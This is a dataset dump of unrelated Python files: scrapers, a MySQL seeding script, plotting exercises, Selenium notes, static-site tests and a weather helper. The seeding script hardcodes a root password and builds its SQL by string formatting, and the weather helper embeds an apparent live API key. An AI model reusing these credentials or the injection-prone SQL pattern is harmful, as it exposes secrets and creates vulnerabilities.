r.headers.get('content-disposition')\n if not extension and content_disposition:\n filenames = re.findall('filename=(.+)', content_disposition)\n try:\n extension = get_format_from_path(filenames[0])[1]\n except IndexError:\n raise FetchingError('Web Service returned invalid download url')\n\n tempdir = tempfile.mkdtemp()\n\n try:\n unique_path = self.unique_path(component.name, component.version)\n filename = '%s.%s' % (unique_path, extension)\n file_path = os.path.join(tempdir, filename)\n\n with open(file_path, 'wb') as f:\n for chunk in r.iter_content(chunk_size=65536):\n if chunk:\n f.write(chunk)\n\n unpack_archive(file_path, download_path)\n finally:\n shutil.rmtree(tempdir)\n\n return [download_path]\n\n @property\n def service_url(self):\n return self.base_url\n\n def serialize(self): # type: () -> Dict\n return {\n 'service_url': self.base_url,\n 'type': self.name,\n }\n","sub_path":"upload_components/component-manager/idf_component_tools/sources/web_service.py","file_name":"web_service.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507539629","text":"__author__ = 'yinyan'\n\"\"\"\nQuestion Description:\nGiven a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree.\n\"\"\"\n#************************************Using a recursion****************************************************\n#\n#\n#\n#Time Complexity O()\n#Space Complexity O()\n##################################Using ###########################################################################\n#\n#\n#\n#\n#\n#Time Complexity O()\n#Space Complexity O()\n\"\"\"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Pitfall and Failures$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\"\"\"\n#\n#\n#\n#\n############################################################################################################\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n if not root: return None\n if p==root or q==root: return root\n left, right=(self.lowestCommonAncestor(kid, p, q) for kid in (root.left, root.right))\n return root if left and right else left or right\n\n\n","sub_path":"LowestCommonAncestorOfABinaryTree_236.py","file_name":"LowestCommonAncestorOfABinaryTree_236.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512765144","text":"from urllib.request import urlopen\n\nfrom bs4 import BeautifulSoup\nfrom googletrans import Translator\n\ndef get_todays_meals():\n # fetch beautiful soup\n meals_html = urlopen('http://dorm.knu.ac.kr/_new_ver/')\n bs = BeautifulSoup(meals_html.read(), 'html.parser')\n\n # find text of meals\n menu_div = bs.find(\"div\", {\"class\": \"today_menu\"})\n all_meals = menu_div.findAll('p')\n\n # translate all meals and create list that stores them\n translator = Translator()\n meals_list = []\n for meal in all_meals:\n meals_list.append(translator.translate(meal.string).text)\n\n return meals_list","sub_path":"cafeteria/meals_fetching.py","file_name":"meals_fetching.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"191338464","text":"import pymysql\r\nimport json\r\nimport random\r\nimport time\r\n\r\n# 前提要求\r\n# 使用MySQL数据库\r\n# 默认端口打开\r\n# 在下方填写正确的参数\r\n\r\n# 本地127.0.0.1地址\r\nip = 'localhost'\r\n# 尽量使用root用户创建\r\nusername = 'root'\r\n# 对应的密码\r\npassword = '2104898'\r\n# 有一个专门的数据库\r\ndbname = 'edu'\r\n# json文件所在路径\r\nurl_classFile = './json/class.json'\r\nurl_userFile = './json/user.json'\r\nurl_authorFile = './json/author.json'\r\nurl_video = './json/video.json'\r\nurl_comment = './json/comment.json'\r\nurl_sub_video = './json/sub_video.json'\r\n\r\n# 连接数据库\r\ndb = pymysql.connect(ip,username,password,dbname)\r\ncursor = db.cursor()\r\n\r\n# 填充【class】表\r\nwith open(url_classFile, 'r',encoding='utf-8') as file :\r\n data_class = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE class')\r\n\r\n try:\r\n for item in data_class:\r\n sql = \"INSERT INTO class (root,sub) VALUES ('%s','%s');\" % (item['root'], item['sub'])\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】class表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】class表写入出错\")\r\n\r\n# 填充【user】表\r\nwith open(url_userFile, 'r',encoding='utf-8') as file :\r\n data_user = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE user')\r\n\r\n try:\r\n for item in data_user:\r\n sql = \"\"\"\r\n INSERT INTO user (user_id,user_email,user_pass,user_name,favor_class,favor_author,collect_video,head_image,sex,author_id,user_info)\r\n VALUES (%s,'%s','%s','%s','%s','%s','%s','%s','%s',%s,'%s')\r\n \"\"\" % (\r\n item['user_id'], item['user_email'], item['user_pass'], item['user_name'], item['favor_class'],\r\n item['favor_author'], item['collect_video'], item['head_image'], item['sex'], item['author_id'],\r\n item['user_info'])\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】user表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】user表写入出错\")\r\n\r\n# 填充【author】表\r\nwith open(url_authorFile, 'r',encoding='utf-8') as file :\r\n data_author = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE author')\r\n\r\n try:\r\n for item in data_author:\r\n sql = \"\"\"\r\n INSERT INTO author (author_id,user_id,fans,upload_video)\r\n VALUES (%s,%s,%s,'%s')\r\n \"\"\" % (item['author_id'],item['user_id'],item['fans'],item['upload_video'])\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】author表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】author表写入出错\")\r\n\r\n# 填充【video】表\r\nwith open(url_video, 'r',encoding='utf-8') as file :\r\n data_video = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE video')\r\n\r\n video_ids = list(range((data_video['video_id'])['start'],(data_video['video_id'])['end']+1))\r\n video_names = data_video['video_name']\r\n video_urls = list(range((data_video['video_url'])['start'],(data_video['video_url'])['end']+1))\r\n video_logos = list(range((data_video['video_logo'])['start'],(data_video['video_logo'])['end']+1))\r\n description = data_video['description']\r\n author_ids = data_video['author_id']\r\n upload_dates = []\r\n\r\n temp_start = time.mktime(tuple(data_video['upload_date']['start']))\r\n temp_end = time.mktime(tuple(data_video['upload_date']['end']))\r\n for i in range(10):\r\n t = random.randint(temp_start, temp_end)\r\n date_touple = time.localtime(t)\r\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\", date_touple)\r\n date = str(date)\r\n upload_dates.append(date)\r\n\r\n try:\r\n for video_id in video_ids:\r\n video_name = video_names[random.randint(0,len(video_names)-1)]\r\n video_url = \"/res/movie/\"+str(video_urls[random.randint(0,len(video_urls)-1)])+\".mp4\"\r\n video_logo = \"/res/logo/\"+str(video_logos[random.randint(0,len(video_logos)-1)])+\".jpg\"\r\n num_watch = random.randint(10,20)\r\n num_like = random.randint(0,num_watch)\r\n num_unlike = random.randint(0,num_like)\r\n author_id = author_ids[random.randint(0,len(author_ids)-1)]\r\n upload_date = upload_dates[random.randint(0,len(upload_dates)-1)]\r\n random_class = data_class[random.randint(0,len(data_class)-1)]\r\n root = random_class['root']\r\n sub = random_class['sub']\r\n\r\n sql = \"\"\"\r\n INSERT INTO video (video_id,video_name,video_url,video_logo,num_watch,num_like,num_unlike,description,author_id,upload_date,root,sub)\r\n VALUES (%d,'%s','%s','%s',%d,%d,%d,'%s',%d,'%s','%s','%s')\r\n \"\"\" % (video_id,video_name,video_url,video_logo,num_watch,num_like,num_unlike,description,author_id,upload_date,root,sub)\r\n\r\n cursor.execute(sql)\r\n\r\n sql = \"\"\"\r\n UPDATE author SET upload_video = CONCAT(upload_video,'-','%d') WHERE author_id = %d ;\r\n \"\"\" % (video_id,author_id)\r\n\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】video表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】video表写入出错\")\r\n\r\n# 填充【comment】表\r\nwith open(url_comment, 'r',encoding='utf-8') as file :\r\n data_comment = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE comment')\r\n\r\n comment_num = data_comment['num']\r\n contents = data_comment['content']\r\n replys = data_comment['reply']['content']\r\n reply_num = data_comment['reply']['num']\r\n\r\n comment_dates = []\r\n temp_start = time.mktime(tuple(data_comment['date']['start']))\r\n temp_end = time.mktime(tuple(data_comment['date']['end']))\r\n for i in range(10):\r\n t = random.randint(temp_start, temp_end)\r\n date_touple = time.localtime(t)\r\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\", date_touple)\r\n date = str(date)\r\n comment_dates.append(date)\r\n\r\n try:\r\n for video_id in video_ids:\r\n for temp_i in range(random.randint(0,comment_num)):\r\n comment_date = comment_dates[random.randint(0,len(comment_dates)-1)]\r\n user_id = int(data_user[random.randint(0,len(data_user)-1)]['user_id'])\r\n content = contents[random.randint(0,len(contents)-1)]\r\n num_like = random.randint(0,15)\r\n reply = ''\r\n\r\n for temp_j in range(random.randint(0,reply_num)):\r\n reply+=(data_user[random.randint(0,len(data_user)-1)]['user_id']+\":::\"+replys[random.randint(0,len(replys)-1)]+\":=:\")\r\n\r\n if reply!='':\r\n reply = reply[:-3]\r\n\r\n sql = \"\"\"\r\n INSERT INTO comment (video_id,date,user_id,content,num_like,reply)\r\n VALUES (%d,'%s',%d,'%s',%d,'%s')\r\n \"\"\" % (video_id,comment_date,user_id,content,num_like,reply)\r\n cursor.execute(sql)\r\n\r\n db.commit()\r\n print('【通知】comment表写入完成')\r\n except:\r\n db.rollback()\r\n print(\"【错误】comment表写入出错\")\r\n\r\n# 填充【sub_video】表\r\nwith open(url_sub_video, 'r',encoding='utf-8') as file :\r\n date_sub_video = json.load(file)\r\n\r\n cursor.execute('TRUNCATE TABLE sub_video')\r\n\r\n sub_video_num_start = date_sub_video['num']['start']\r\n sub_video_num_end = date_sub_video['num']['end']\r\n video_id = date_sub_video['video_id_start']\r\n names = date_sub_video['name']\r\n sub_url = date_sub_video['url']\r\n images_start = date_sub_video['image']['start']\r\n images_end = date_sub_video['image']['end']\r\n\r\n progresses = []\r\n for pro_i in range(5, 105, 10):\r\n progresses.append(float(pro_i)/100.0)\r\n\r\n try:\r\n for root_video_id in video_ids:\r\n for progress in progresses:\r\n for temp_i in range(random.randint(sub_video_num_start,sub_video_num_end)):\r\n name = names[random.randint(0, len(names) - 1)]\r\n image = \"/res/sub_logo/\"+str(random.randint(images_start,images_end))+\".jpg\"\r\n sub_video_like = random.randint(0,15)\r\n\r\n sql = \"\"\"\r\n INSERT INTO sub_video (root_video_id,progress,video_id,name,image,url,`like`)\r\n VALUES (%d,%f,%d,'%s','%s','%s',%d)\r\n \"\"\" % (root_video_id,progress,video_id,name,image,sub_url,sub_video_like)\r\n cursor.execute(sql)\r\n video_id+=1\r\n\r\n db.commit()\r\n print('【通知】sub_video表写入完成')\r\n except BaseException as e:\r\n db.rollback()\r\n print(\"【错误】sub_video表写入出错\")\r\n print(e)\r\n\r\n\r\n\r\n\r\ndb.close()","sub_path":"Init_Script/Create_DBTable.py","file_name":"Create_DBTable.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"64788901","text":"import csv\n\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime as dt\n\nsitka_filename = 'Data visualization\\\\Chapter 2\\\\data\\\\sitka_weather_2018_simple.csv'\ndeath_valley_filename = 'Data visualization\\\\Chapter 2\\\\data\\\\death_valley_2018_simple.csv'\n\n# Sitka data\nwith open(sitka_filename) as f:\n csv_data_sitka = csv.reader(f)\n sitka_header_data = next(csv_data_sitka)\n\n for i, data in enumerate(sitka_header_data):\n if data == 'DATE':\n s_date_index = i\n if data == 'TMAX':\n s_tmax_index = i\n if data == 'TMIN':\n s_tmin_index = i \n\n # Data lists for sitka s_\n s_dates = []\n s_highs = []\n s_lows = []\n\n # Data gathering loop\n for row in csv_data_sitka:\n date = dt.strptime(row[s_date_index], '%Y-%m-%d')\n try:\n high_t = int(row[s_tmax_index])\n low_t = int(row[s_tmin_index])\n except ValueError:\n print(f'Missing Value for {date}!')\n else:\n s_dates.append(date)\n s_highs.append(high_t)\n s_lows.append(low_t)\n\n# Death valley data\nwith open(death_valley_filename) as f:\n csv_data_death_valley = csv.reader(f)\n death_valley_header_data = next(csv_data_death_valley)\n\n for i, data in enumerate(death_valley_header_data):\n if data == 'DATE':\n dv_date_index = i\n elif data == 'TMAX':\n dv_tmax_index = i\n elif data == 'TMIN':\n dv_tmin_index = i\n\n # Data lists for death valley dv_\n dv_highs = []\n dv_lows = []\n dv_dates = []\n\n # Data loop\n for row in csv_data_death_valley:\n date = dt.strptime(row[dv_date_index], '%Y-%m-%d')\n try:\n high_t = int(row[dv_tmax_index])\n low_t = int(row[dv_tmin_index])\n except ValueError:\n print(f'Missing data for {date}.')\n else:\n dv_dates.append(date)\n dv_highs.append(high_t)\n dv_lows.append(low_t)\n\n# Visualization\n\nplt.style.use('seaborn-dark')\nfig, ax = plt.subplots(figsize=(15, 7), dpi=128)\n\n# Sitka plots\nax.plot(s_dates, s_highs, c='red', alpha=0.4, label='Sitka Highs')\nax.plot(s_dates, s_lows, c='blue', alpha=0.6 ,label='Sitka Lows')\nax.fill_between(s_dates, s_highs, s_lows, facecolor='orange', alpha=0.2)\n\n# Death Valley plots\nax.plot(dv_dates, dv_highs, c='red', alpha=0.6, label='Death Valley Highs')\nax.plot(dv_dates, dv_lows, c='blue', alpha=0.4, label='Death Valley Lows')\nax.fill_between(dv_dates, dv_highs, dv_lows, facecolor='purple', alpha=0.2)\n\n# Styling\nax.set_title('Comparison between Sitka and Death Valley by daily temperature, 2018', fontsize=22)\nax.set_xlabel('Dates', fontsize=14)\nax.set_ylabel('Temperature (F)', fontsize=14)\nax.tick_params(axis='both', which='major', labelsize=16)\nfig.autofmt_xdate()\n\nplt.legend()\nplt.show()\n\n# A lot of code could be refactored, just make 2 functions.\n# One function for the csv file extractor with 3 lists as return\n# And the other one for visualizing the data, 1 complete plot as return\n","sub_path":"Data visualization/Chapter 2/sitka_death_valley_comaprison.py","file_name":"sitka_death_valley_comaprison.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155864919","text":"# -*- coding:utf-8 -*-\n'''\n\n运行错误:\nUserWarning: Selenium support for PhantomJS has been deprecated, please use headless versions of Chrome or Firefox instead\n warnings.warn('Selenium support for PhantomJS has been deprecated, please use headless '\n\n\n大概意思:selenium已经放弃PhantomJS,了,建议使用火狐或者谷歌无界面浏览器。\n\n如果要取消错误,可以降低 Selenium 的版本\n\n\n查找页面元素:\n\n 返回一个元素:\n\n find_element_by_id # id定位\n find_element_by_name # name定位\n find_element_by_xpath # xpath定位\n\n # (查找元素的链接文本)\n find_element_by_link_text # link定位\n\n # (查找元素的链接的部分文本)\n find_element_by_partial_link_text # partial_link定位\n\n find_element_by_tag_name # tag定位\n find_element_by_class_name # class定位\n find_element_by_css_selector # css定位\n\n\n 复数形式:\n\n find_elements_by_name\n find_elements_by_xpath\n find_elements_by_link_text\n find_elements_by_partial_link_text\n find_elements_by_tag_name\n find_elements_by_class_name\n find_elements_by_css_selector\n\n\n\n 这两种就是快失传了的\n find_element(self, by='id', value=None)\n find_elements(self, by='id', value=None)\n\n\n 1.element方法定位到是是单数,是直接定位到元素\n\n 2.elements方法是复数,这个学过英文的都知道,定位到的是一组元素,返回的是list队列\n\n\n\n元素操作方法:\n\n clear 清除元素的内容\n send_keys 模拟按键输入\n click 点击元素\n submit 提交表单\n quit 退出浏览器\n\n\n获取常用的值:\n\n size 获取元素的尺寸\n text 获取元素的文本\n get_attribute(name) 获取属性值\n location 获取元素坐标,先找到要获取的元素,再调用该方法\n page_source 返回页面源码\n driver.title 返回页面标题\n current_url 获取当前页面的URL\n is_displayed() 设置该元素是否可见\n is_enabled() 判断元素是否被使���\n is_selected() 判断元素是否被选中\n tag_name 返回元素的tagName\n\n'''\n\nfrom selenium import webdriver\n\nimport time\n\ndriver = webdriver.PhantomJS()\n\ndriver.get('http://www.baidu.com/')\n\nprint(driver.title)\n\nprint(driver.page_source)\n\nelement = driver.find_element_by_name('wd')\nelement.send_keys('phantomjs')\n\ndriver.save_screenshot('phantomjs.png')\n\ndriver.find_element_by_id(\"kw\").clear()\n\n\ndriver.find_element_by_id(\"kw\").send_keys(u'美女')\ndriver.find_element_by_id('su').click()\ndriver.save_screenshot('meinv.png')\n\n\nelement = driver.find_element_by_class_name(\"s_btn\")\n\nprint('sss')\n\ndriver.quit()\n\n'''\n
Cheddar
Gouda
\n'''\n","sub_path":"Exercise/Reptile/Selenium/0、Selenium 基本用法.py","file_name":"0、Selenium 基本用法.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159728483","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom iabox import Interval, cadd, csqr, cmul, math\n\nR1 = R2 = Interval(0, math.inf)\nR = I2 = Interval(-math.inf, math.inf)\n\nE = Interval(23, 26)\nI = Interval(4, 8)\nU1 = Interval(10, 11)\nU2 = Interval(14, 17)\nP = Interval(124, 130)\n\nprint(f\"R1={R1}, R2={R2}, E={E}, I={I}, U1={U1}, U2={U2}\")\n\nfor k in range(10): # To be more accurate to the fixed point\n R, R1, R2 = cadd(R, R1, R2)\n P, E, I = cmul(P, E, I)\n E, R, I = cmul(E, R, I)\n U2, R2, I = cmul(U2, R2, I)\n U1, R1, I = cmul(U1, R1, I)\n E, U1, U2 = cadd(E, U1, U2)\n I2, I = csqr(I2, I)\n P, R, I2 = cmul(P, R, I2)\n\nprint(f\"R1={R1}, R2={R2}, E={E}, I={I}, U1={U1}, U2={U2}\")\n","sub_path":"iamooc/04_circuit.py","file_name":"04_circuit.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611118332","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef microcar(x,y):\n \n ex_hor_disp = np.array([])\n ex_vert_disp = np.array([])\n \n act_hor_disp = np.array([])\n act_vert_disp = np.array([])\n \n ex_dist = np.array([])\n act_dist = np.array([])\n \n \n for i in range(len(x)):\n \n #This is us defining our measurements of displacement and distance, we can do so globally(outside each for loop) because it's calculated for each file just once\n ex_distance = 0\n act_distance = 0\n \n with open(x[i],'r') as ex_inputfile:\n #This is us declaring and initalising variables in a local scope to reset for each car\n vert_displacement = 0\n hor_displacement = 0\n \n \n \n \n \n for line in ex_inputfile:\n instruction = line.split(',')\n instruction[2] = instruction[2].strip()\n \n \n \n \n #This is just looking at the instructed/expected displacement over time\n if instruction[0] == 'N':\n vert_displacement += (int(instruction[1])*int(instruction[2]))\n \n elif instruction[0] == 'S':\n vert_displacement -= (int(instruction[1])*int(instruction[2]))\n \n elif instruction[0] == 'E':\n hor_displacement += (int(instruction[1])*int(instruction[2]))\n \n else:\n hor_displacement -= (int(instruction[1])*int(instruction[2]))\n \n ex_distance += (int(instruction[1])*int(instruction[2]))\n \n vert_displacement = round(vert_displacement,2)\n hor_displacement = round(hor_displacement,2)\n ex_distance = round(ex_distance,2)\n \n \n #This is used to add the final expected displacements to the array\n ex_hor_disp = np.append(ex_hor_disp,hor_displacement)\n ex_vert_disp = np.append(ex_vert_disp,vert_displacement)\n \n #Likewise, this is used to add the final expected distance travelled to the array\n ex_dist = np.append(ex_dist,ex_distance)\n \n\n\n with open (y[i],'r') as act_inputfile:\n #This is again just us declaring and initalising variables on a local scale for each car\n vert_displacement = 0\n hor_displacement = 0\n \n for line in act_inputfile:\n action = line.split(',')\n action[2] = action[2].strip()\n \n \n \n #This is just looking at the actual displacement over time\n if action[0] == 'N':\n vert_displacement += (int(action[1])*int(action[2]))\n \n elif action[0] == 'S':\n vert_displacement -= (int(action[1])*int(action[2]))\n \n elif action[0] == 'E':\n hor_displacement += (int(action[1])*int(action[2]))\n \n else:\n hor_displacement -= (int(action[1])*int(action[2]))\n \n act_distance += (int(action[1])*int(action[2]))\n \n vert_displacement = round(vert_displacement,2)\n hor_displacement = round(hor_displacement,2)\n act_distance = round(act_distance,2)\n \n #This is used to add the final expected displacements to the array\n act_hor_disp = np.append(act_hor_disp,hor_displacement)\n act_vert_disp = np.append(act_vert_disp,vert_displacement)\n \n #Likewise, this is used to add the final expected distance travelled to the array\n act_dist = np.append(act_dist,act_distance)\n \n \n return ex_hor_disp, ex_vert_disp, act_hor_disp, act_vert_disp, ex_dist, act_dist\n\n\ndef plotmicrocar(x,y):\n \n \n #setting each array equal to the returned arrays from the microcar function\n ex_hor_disp, ex_vert_disp, act_hor_disp, act_vert_disp, ex_dist, act_dist = microcar(x,y)\n \n #And now, we start to plot\n \n #The reason we created the zero array is just so that if all the displacements are positive, we'll just have a minimum of 0\n zero_array = np.array([0])\n #One of the criteria is to adjust the axes such that the plots are square, so to do so,we'll find the minimum and maximum of the vertical and horizontal displacements\n min_vert = min(np.concatenate((ex_vert_disp,act_vert_disp,zero_array),axis = 0))\n max_vert = max(np.concatenate((ex_vert_disp,act_vert_disp,zero_array),axis = 0))\n \n min_hor = min(np.concatenate((ex_hor_disp,act_hor_disp,zero_array),axis = 0))\n max_hor = max(np.concatenate((ex_hor_disp,act_hor_disp,zero_array),axis = 0))\n \n min_all = min(min_vert,min_hor)\n max_all = max(max_vert,max_hor)\n print(min_all)\n print(max_all)\n \n #This is the top graph, showing expected vs actual distances covered by each car\n \n #This is just declaring that it's a subplot, but the problem is, how do we adjust the size of the top plot so it takes up the whole top row?\n \n #This problem is fixed by the fact that you don't have to have consistent row and column numbers for each subplot, just that the ordering makes sense.\n plt.subplot(2,1,1)\n \n \n '''Really, this whole part is just taken from an online source, at least the width adjustment part is'''\n #This is getting the x position of each bar, for the expected distances\n x1 = np.arange(len(ex_dist))\n \n #This is getting the x positions of each bar, for the actual distances\n x2 = [x + 0.2 for x in x1]\n \n #This is actually plotting each one now\n \n #Plot the expected distances for each car\n plt.bar(x1, ex_dist, width = 0.2, color = 'blue', label = 'Exp')\n \n #Plot the actual distances for each car\n plt.bar(x2, act_dist, width = 0.2, color = 'black', label = 'Act')\n \n #general layout\n plt.xlabel('mcar')\n plt.ylabel('Dist')\n \n #So usually the tick would appear in the middle of the left bar if we just had x1, but we want it in the middle, so we use x1+0.1, which is half the width of the bar.\n plt.xticks(x1 + 0.1, x1)\n plt.legend()\n plt.title(\"Distance\")\n \n plt.tight_layout()\n \n \n \n \n #This is the bottom left subplot\n miv_legend_array = []\n for i in range(len(ex_hor_disp)):\n miv_legend_array.append(\"mivcar \"+str(i))\n \n \n \n \n plt.subplot(2,2,3)\n plt.xlim(min_all-10,max_all+10)\n plt.ylim(min_all-10,max_all+10)\n for i in range(len(ex_hor_disp)):\n plt.scatter([ex_hor_disp[i]],[ex_vert_disp[i]], marker = 'o', c = np.random.rand(3,) )\n plt.xlabel('x Displacement')\n plt.ylabel('y Disp (m)')\n plt.title('E')\n plt.legend([x for x in miv_legend_array])\n \n #This is the bottom right subplot\n \n #This just generates the suff for the legend\n car_legend_array = []\n for i in range(len(ex_hor_disp)):\n car_legend_array.append(\"Car \"+str(i))\n \n \n \n plt.subplot(2,2,4)\n plt.xlim(min_all-10,max_all+10)\n plt.ylim(min_all-10,max_all+10)\n for i in range(len(ex_hor_disp)):\n plt.scatter([act_hor_disp[i]],[act_vert_disp[i]], marker = 'x', c = np.random.rand(3,))\n plt.xlabel('x Displacement')\n plt.ylabel('y Disp (m)') \n plt.title('Actual')\n plt.legend([x for x in car_legend_array])\n plt.show()\n \n\n \n \n \n\n \n \n \n \n","sub_path":"Zhou_22465982,v.2.py","file_name":"Zhou_22465982,v.2.py","file_ext":"py","file_size_in_byte":7741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563612017","text":"import re\nimport pytest\nimport mock\nfrom piecrust.data.filters import (\n PaginationFilter, HasFilterClause, IsFilterClause,\n page_value_accessor)\nfrom piecrust.rendering import QualifiedPage, PageRenderingContext, render_page\nfrom piecrust.serving.util import find_routes\nfrom piecrust.sources.base import REALM_USER, REALM_THEME\nfrom .mockutil import mock_fs, mock_fs_scope\n\n\n@pytest.mark.parametrize('uri, route_specs, expected',\n [\n ('/',\n [{'src': 'pages', 'pat': '(?P.*)'}],\n [('pages', {'path': '/'})]),\n ('/',\n [{'src': 'pages', 'pat': '(?P.*)'},\n {'src': 'theme', 'pat': '(?P.*)', 'realm': REALM_THEME}],\n [('pages', {'path': '/'}), ('theme', {'path': '/'})])\n ])\ndef test_find_routes(uri, route_specs, expected):\n routes = []\n for rs in route_specs:\n m = mock.Mock()\n m.source_name = rs['src']\n m.source_realm = rs.setdefault('realm', REALM_USER)\n m.uri_re = re.compile(rs['pat'])\n m.matchUri = lambda u: m.uri_re.match(u).groupdict()\n routes.append(m)\n matching = find_routes(routes, uri)\n\n assert len(matching) == len(expected)\n for i in range(len(matching)):\n route, metadata, is_sub_page = matching[i]\n exp_source, exp_md = expected[i]\n assert route.source_name == exp_source\n assert metadata == exp_md\n\n\n@pytest.mark.parametrize(\n 'tag, expected_indices',\n [\n ('foo', [1, 2, 4, 5, 6]),\n ('bar', [2, 3, 4, 6, 8]),\n ('whatever', [5, 8]),\n ('unique', [7]),\n ('missing', None)\n ])\ndef test_serve_tag_page(tag, expected_indices):\n tags = [\n ['foo'],\n ['foo', 'bar'],\n ['bar'],\n ['bar', 'foo'],\n ['foo', 'whatever'],\n ['foo', 'bar'],\n ['unique'],\n ['whatever', 'bar']]\n\n def config_factory(i):\n c = {'title': 'Post %d' % (i + 1)}\n c['tags'] = list(tags[i])\n return c\n\n fs = (mock_fs()\n .withConfig()\n .withPages(8, 'posts/2015-03-{idx1:02}_post{idx1:02}.md',\n config_factory)\n .withPage('pages/_tag.md', {'layout': 'none', 'format': 'none'},\n \"Pages in {{tag}}\\n\"\n \"{%for p in pagination.posts -%}\\n\"\n \"{{p.title}}\\n\"\n \"{%endfor%}\"))\n with mock_fs_scope(fs):\n app = fs.getApp()\n page = app.getSource('pages').getPage({'slug': '_tag', 'tag': tag})\n route = app.getGeneratorRoute('posts_tags')\n assert route is not None\n\n route_metadata = {'slug': '_tag', 'tag': tag}\n qp = QualifiedPage(page, route, route_metadata)\n ctx = PageRenderingContext(qp)\n route.generator.prepareRenderContext(ctx)\n rp = render_page(ctx)\n\n expected = \"Pages in %s\\n\" % tag\n if expected_indices:\n for i in reversed(expected_indices):\n expected += \"Post %d\\n\" % i\n assert expected == rp.content\n\n\n@pytest.mark.parametrize(\n 'category, expected_indices',\n [\n ('foo', [1, 2, 4]),\n ('bar', [3, 6]),\n ('missing', None)\n ])\ndef test_serve_category_page(category, expected_indices):\n categories = [\n 'foo', 'foo', 'bar', 'foo', None, 'bar']\n\n def config_factory(i):\n c = {'title': 'Post %d' % (i + 1)}\n if categories[i]:\n c['category'] = categories[i]\n return c\n\n fs = (mock_fs()\n .withConfig({\n 'site': {\n 'taxonomies': {\n 'categories': {'term': 'category'}\n }\n }\n })\n .withPages(6, 'posts/2015-03-{idx1:02}_post{idx1:02}.md',\n config_factory)\n .withPage('pages/_category.md', {'layout': 'none', 'format': 'none'},\n \"Pages in {{category}}\\n\"\n \"{%for p in pagination.posts -%}\\n\"\n \"{{p.title}}\\n\"\n \"{%endfor%}\"))\n with mock_fs_scope(fs):\n app = fs.getApp()\n page = app.getSource('pages').getPage({'slug': '_category',\n 'category': category})\n route = app.getGeneratorRoute('posts_categories')\n assert route is not None\n\n route_metadata = {'slug': '_category', 'category': category}\n qp = QualifiedPage(page, route, route_metadata)\n ctx = PageRenderingContext(qp)\n route.generator.prepareRenderContext(ctx)\n rp = render_page(ctx)\n\n expected = \"Pages in %s\\n\" % category\n if expected_indices:\n for i in reversed(expected_indices):\n expected += \"Post %d\\n\" % i\n assert expected == rp.content\n\n","sub_path":"tests/test_serving.py","file_name":"test_serving.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546501163","text":"#!/usr/bin/python3\n#writer: Abhishek Bishnoi\n# importing open weather msp library\nimport pyowm\n#api key to access api \nowm = pyowm.OWM('a3ac1a7d13422b804a326029769907f2')\n# this function returns all values \ndef common(city):\n global observation,weather,status,temperature,wind_speed,humidity,pressure\n observation = owm.weather_at_place(city)\n weather = observation.get_weather()\n status = weather.get_status()\n temperature = weather.get_temperature('celsius')['temp']\n wind_speed = weather.get_wind()['speed']\n humidity = weather.get_humidity()\n pressure = weather.get_pressure()['press']\n# this is used to get complete weather\ndef completeWeather(city):\n global wind_speed,status,temperature,humidity,pressure\n common(city)\n return \"The weather in \"+city+\" is \"+status+\" with temperature of \"+str(temperature)+\" degree Celsius \"+\"with wind speed of \"+str(wind_speed)+\" meter per second \"+\"and with humidity of \"+str(humidity)+\" %\"+\" and with \"+str(pressure)+\" Atmospheric pressure.\"\n# this function is used to know status about weather in a particular city\ndef statusWeather(city):\n global status\n common(city)\n return \"The weather in \"+city+\" is \"+status\n# this function is used to find temprature of a city \ndef tempWeather(city):\n global temperature\n common(city)\n return \"The temperature in \"+city+\" is \"+str(temperature)+\" degree Celsius\"\n# this function is used to find wind speed of any city \ndef wspeedWeather(city):\n global wind_speed\n common(city)\n return \"The wind speed in \"+city+\" is \"+str(wind_speed)+\" meter per second\"\n# this function is used to find humidity of any city\ndef humidityWeather(city):\n global humidity\n common(city)\n return \"The humidity in 